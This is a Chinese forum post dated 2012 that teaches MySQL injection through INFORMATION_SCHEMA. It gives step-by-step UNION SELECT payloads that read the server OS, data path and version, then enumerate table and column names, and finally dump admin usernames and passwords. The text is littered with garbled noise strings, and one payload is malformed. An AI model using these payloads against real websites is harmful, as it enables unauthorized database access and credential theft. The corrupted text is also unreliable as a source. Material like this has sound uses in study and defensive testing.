本文介绍MYSQL盲注的一些语句和方法
) m; C: K1 J( d" h- R2 q* S. O
4 u8 f+ ]) G! U; x1 A学习盲注前先了解下 IFORMATION_SCHEMA 库
0 u+ T& k/ K; @* T$ n7 h) u# _5 o) ^6 d0 v, \& ?2 \
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有0 F2 P: e. d) H7 y. h% V# h
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
0 o. o; r8 V7 w+ P5 `$ Y" s( y1.得到所有数据库名:( t( k3 F, v/ V2 l* F
|SCHEMATA ->存储数据库名的表% r1 y' E1 {8 E) \( k
|---字段:SCHEMA_NAME ->数据库名称8 E/ C) Y# q4 f Y5 @) S
0 H; w! z: Q& z* o
|TABLES ->存储表名
3 Z/ ]- M k# e8 S& D|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
! q! k4 X% _7 f" U- ~+ d. l; x% I|---字段:TABLE_NAME ->存储表的表名
" K0 B: j; N% _, V7 _- L1 a
" j9 Z- v/ m$ e/ G|COLUMNS ->存储的字段名表* ~) B1 J, A" L0 L: e
|---字段:TABLE_SCHEMA ->该字段所属数据库名
. d8 S* s$ N4 f7 y; c|---字段:TABLE_NAME ->存储所属表的名称8 Z6 s: `7 z3 }
8 J, s5 |* L- y+ C|---字段:COLUMN_NAME ->该字段的名称" F% u* ~% f9 ]$ _
' D" T3 F! g% d5 M/ c2 s1 g, z / l% i( F0 o- u# N. z8 S1 @
2 ^- u* e# `) b+ Q###########################################################################2 {' u- w( W- o& ~+ Z( s G$ Z- I, x- S
3 W2 Q6 G' y& P0x001 获取系统信息:4 n& A: A1 d' `! i. ?
8 D, M0 w( Y# }! Cunion select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
9 l! A6 C6 G o5 m1 s! f$ a& G0 k* ?- B0 S1 I' y
/*, h2 H1 I6 _0 |; w3 d
, x2 v D8 S/ J; E@@global.version_compile_os 获取系统版本
+ ?/ N. k$ r& |5 a {" _0 x0 `8 T( b& w
@@datadir 数据库路径3 E" F; P* y* c7 X9 j
database() 当前数据库名称( B: h- c. g3 n A7 ?- G; ?2 [8 ~
0x3c62723e 换行HEX值8 k3 d. K% V' v9 J0 P
3 O7 Z1 ^2 ?: m9 [/ f*/
7 I) {, z6 S+ z5 o8 E+ S A5 h, m8 L7 S) |6 Q
4 ]4 D+ w( m5 G" n: f* p
7 I3 B; d* c- A* ~7 g
######################################################################& J" |: Q+ j, f! ] F1 D
) N }0 O8 ?1 R8 x
0x002 获取表名
9 M8 a* X: D* B6 {& y2 G7 A: l9 O9 `; M3 Y+ \. Z5 f B0 S/ e
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*, p* N* T& P1 t+ J+ D6 n) Y2 c4 P
I( e% P- F# \
9 _9 \5 o) Z' y8 P# @& z# b% c) n6 \2 K6 _" p" ~
/** W6 P) J* r3 o% F
$ ? b( L3 _: j8 } y+ S" j0 ?" E
0x67617264656e 为当前数据库名: A' w s! M u9 V1 B
- h3 o, [- Y' Bgroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名
" G d# W! c3 C2 j3 } E; P. f4 a' m
*/
* |+ @* B/ q. i/ _% W8 f
/ i- N+ r; C T+ z! T######################################################################
9 O" A# a& y/ ?+ Z6 m- R1 N1 x+ D" P
" z" ?4 v, h5 j& j. ^: l, \/ q' `- D$ ?$ w
0x003 获取字段. l g+ R' Q8 f: b" @$ [1 z
! q# c" l# U7 s# }/ a: p' x& `
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*7 C" g# {2 H+ T
! G% q) m- s6 u/*
/ ~6 ^: |: q2 C0 V& i
5 M1 D& I; T4 f7 ^group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
" ]/ D, R- l$ E: G2 \3 |
, j9 s# A- W. y( V0x61646d696e ->选择一个表( R: ]' e8 w0 V6 t6 V4 k
0 _1 q" m) r- x, t" h
0x67617264656e ->数据库名) ~9 {$ q! _) y2 u. L1 B N
* {4 P6 o# i7 n6 H9 I*/
4 s0 F& d- e g* s' |( d: l) L7 H# h. Q( r/ h$ R9 K
#####################################################################* q, }+ u4 r$ H8 T
9 H) g* a# Z2 U8 q
; Q9 Z0 S* R( M* B8 x0 Z. ]2 h3 a8 a6 k+ s, u5 p. O$ U }
0x004 获取数据
3 z3 w6 f' L# J2 x, |* x8 H. J% ~+ E: {; d, [: Q- |
union select 1,2,3$ |: ?) c) F: D+ p% }7 p' p5 n
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin( q8 V& j: n: J& I. K
. }! n: b0 o# Y! w: A* sunion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin6 @; L h# Z' _8 E& t" s3 d, u4 g8 N
7 `5 G' \. X5 [$ [
) b" S9 t$ ]- R0 O
8 I& N* a/ Y1 q* l, I. R4 C' @/*: N7 @3 X0 s4 s4 T
5 c* }8 t# e, {4 X. X' K& c6 a! R0x3c62723e 换行符号HEX编码
- A, k3 Z/ j n6 ~. b# x
1 s, K- K8 A; {- V f2 i$ B% `group_concat 同时获得该字段所有数据6 G% e7 d+ G* Q( B7 x5 v
2 W; [( D! o5 f! S1 U*/
9 I+ X' O. E4 u, h2 b7 E+ H7 q! [% d; t* Q& L4 y% f
|
发表于 2012-9-13 17:48:44
收藏
支持
反对